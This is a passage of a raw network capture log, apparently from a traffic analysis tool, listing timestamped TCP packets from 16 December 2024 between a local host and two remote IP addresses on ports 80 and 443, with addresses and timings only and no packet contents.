                                                                                                                                                                                              Dec 16, 2024 01:01:45.205488920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.212858915 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.213627100 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.213685989 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.213697910 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.213737965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.213777065 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.213789940 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.213814974 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.213829041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.214057922 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.214312077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.214363098 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.214824915 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.214862108 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.214875937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.214907885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.215825081 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.215878963 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.216169119 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.216217041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.217236042 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.217272997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.217315912 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.218067884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.218301058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.218352079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.219379902 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.219430923 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.219434977 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.220652103 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.220688105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.220720053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.220752001 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.221642017 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.221848965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.221899033 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.223012924 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.223051071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.223102093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.224174023 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.224211931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.224229097 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.225327969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.225332975 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.225383997 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.225387096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.225440025 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.226485968 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.226660967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.226715088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.227746010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.227823973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.227875948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.228679895 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.228745937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.229168892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.230026960 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.230078936 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.230170012 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.231218100 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.231270075 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.231345892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.231398106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.232306004 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.232510090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.232561111 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.233567953 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.233666897 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.233719110 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.234867096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.234908104 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.234921932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.235874891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.235924959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.236058950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.237085104 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.237137079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.237231970 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.237632036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.238069057 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.238105059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.238154888 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.238415003 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.238464117 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.238564968 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.239201069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.240904093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.240938902 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.240994930 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.241312981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.241348028 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.241400957 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.242727995 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.242856979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.242908955 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.243386984 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.243422985 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.243473053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.245275021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.245459080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.245502949 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.245835066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.245870113 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.245917082 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.247122049 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.247159004 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.247180939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.247908115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.247958899 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.248002052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.249093056 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.249145985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.249202013 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.249250889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.250302076 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.250355959 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.250405073 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.254597902 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.254648924 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.254687071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.254709959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.254722118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.254731894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.254869938 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.254911900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.254918098 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.256320000 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.256376028 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.256521940 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.257210016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.257637024 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.257673979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.257726908 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.258485079 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.258521080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.258554935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.258572102 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.258595943 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.258991003 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.261053085 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.261090994 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.261100054 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.261166096 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.261342049 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.261449099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.261499882 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.263511896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.263547897 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.263600111 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.263607979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.263647079 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.263655901 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.265332937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.265577078 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.265626907 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.265743017 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.265790939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.267121077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.267158985 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.267173052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.267203093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.267787933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.267822981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.267837048 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.267882109 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.268162966 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.268213034 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387022972 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387084961 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387105942 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387226105 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387275934 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387276888 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387278080 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387305975 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387375116 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387394905 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387396097 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387435913 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.387475967 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:45.393945932 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.394036055 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.394098997 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.394486904 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.394687891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.394743919 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.394829035 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.394876957 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.395879030 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.396076918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.396126986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.397218943 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.403168917 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.404257059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.404309034 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.404361010 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.404599905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.404637098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.404686928 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.405571938 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.405709982 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.405760050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.406776905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.406826973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.407179117 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.407263041 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.407327890 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.408337116 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.408520937 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.408571959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.409183979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.409219027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.409235954 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.409603119 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.409655094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.409765959 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.411163092 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.413137913 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.413187027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.413245916 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.414061069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.414096117 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.414153099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.414321899 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.414371967 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.414494038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.415160894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.415613890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.415648937 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.415663958 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.416779041 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.416835070 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.416841984 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.417938948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.417973995 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.418000937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.418036938 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.419198990 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.419233084 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.419294119 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.419365883 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.419401884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.419418097 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.419744968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.421484947 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.421545029 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.422072887 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.422123909 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.422138929 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.422174931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.422188997 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.422224045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.423460960 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.423635960 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.423687935 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.424504042 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.424539089 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.424591064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.426175117 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.426209927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.426223040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.426246881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.426297903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.426331997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.427159071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.428749084 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.428922892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.428956032 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.428989887 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.429950953 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.429986000 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.430030107 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.430269003 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.430304050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.430355072 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.432531118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.432703018 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.432758093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.433624983 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.433676004 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.433841944 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.434470892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.434525013 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.434648037 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.435148954 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.435761929 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.435796976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.435847998 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.436876059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.437058926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:45.437108040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:45.437956095 CET804984831.41.244.11192.168.2.4
